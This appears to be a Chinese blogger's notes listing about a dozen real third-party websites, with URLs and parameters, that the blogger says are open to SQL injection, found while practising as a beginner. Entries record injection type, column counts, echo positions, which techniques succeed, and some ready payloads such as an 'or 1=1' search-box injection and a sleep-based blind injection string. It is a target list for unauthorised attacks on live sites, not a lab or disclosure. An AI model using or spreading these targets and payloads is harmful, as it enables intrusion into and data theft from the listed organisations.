此數(shù)據(jù)為博主在新手階段練習(xí)sql注入時(shí)發(fā)現(xiàn)的站點(diǎn)，漏洞可能修復(fù)，備注可能錯(cuò)誤

url: https://www.uni-1.com.hk/about_en.php?id=2
注入點(diǎn)類型：數(shù)值
sql報(bào)錯(cuò)回顯：無(wú)
sql語(yǔ)句執(zhí)行：[order by] [union]
字段數(shù)：14
回顯點(diǎn)：12，13，14

url: https://atmos.mora.com.pl/blank.php?id=19088
注入點(diǎn)類型：數(shù)值
sql報(bào)錯(cuò)回顯：無(wú)
sql語(yǔ)句執(zhí)行：順利
回顯點(diǎn)：1，2，3
用戶權(quán)限：低

https://www.csi-india.org/news/index.php?id=18
注入點(diǎn)類型：數(shù)值
sql報(bào)錯(cuò)回顯：無(wú)
sql語(yǔ)句執(zhí)行：順利
字段數(shù)：8
回顯點(diǎn)：3，4，5，6

http://jwsm.cc/blank.php?id=136
注入點(diǎn)類型：num
sql報(bào)錯(cuò)回顯：無(wú)
權(quán)限：普通

https://esjindex.org/search.php?id=2
注入點(diǎn)類型：字符?
異常載荷：'?
sql報(bào)錯(cuò)回顯：存在
字段：22
union聯(lián)合查詢失效
sleep判斷失效

http://www.qdbohai.com/project/list.php
注入點(diǎn)類型：搜索框
傳參類型：post傳參
輸出[all]載荷：keywords=aaaa' or 1=1--+

https://www.sunchampion.com/about.php?id=41
注入點(diǎn)類型：數(shù)值
傳參類型：get
sql報(bào)錯(cuò)回顯：存在
回顯點(diǎn)：存在
sql報(bào)錯(cuò)盲注載荷：exreactvalue

url：https://www.zenith.edu.hk/tc/school.php?id=35
注入點(diǎn)：id=35
類型：str
sql報(bào)錯(cuò)回顯：存在
頁(yè)面回顯：無(wú)，頁(yè)面自動(dòng)跳轉(zhuǎn)
sql報(bào)錯(cuò)盲注載荷：exreactvalue
comment：union非法混合，

url：https://abp.bzh/article.php?id=31347
類型：str
sql報(bào)錯(cuò)回顯：存在
頁(yè)面回顯：無(wú)
注入方式：sleep延時(shí)盲注
comment：order by失效，union失效
盲注載荷：' and if((length(database()))=13,sleep(0),sleep(5)) --+

url：https://www.ciritas.ru/faq2.php?id=2
類型：str

url：https://uppo.pt/announce.php?id=136
類型：str
sql報(bào)錯(cuò)回顯：無(wú)
字段數(shù)：19
comment：union失效，403

url：https://www.spbigbag.com/news_view.php?id=1
類型：str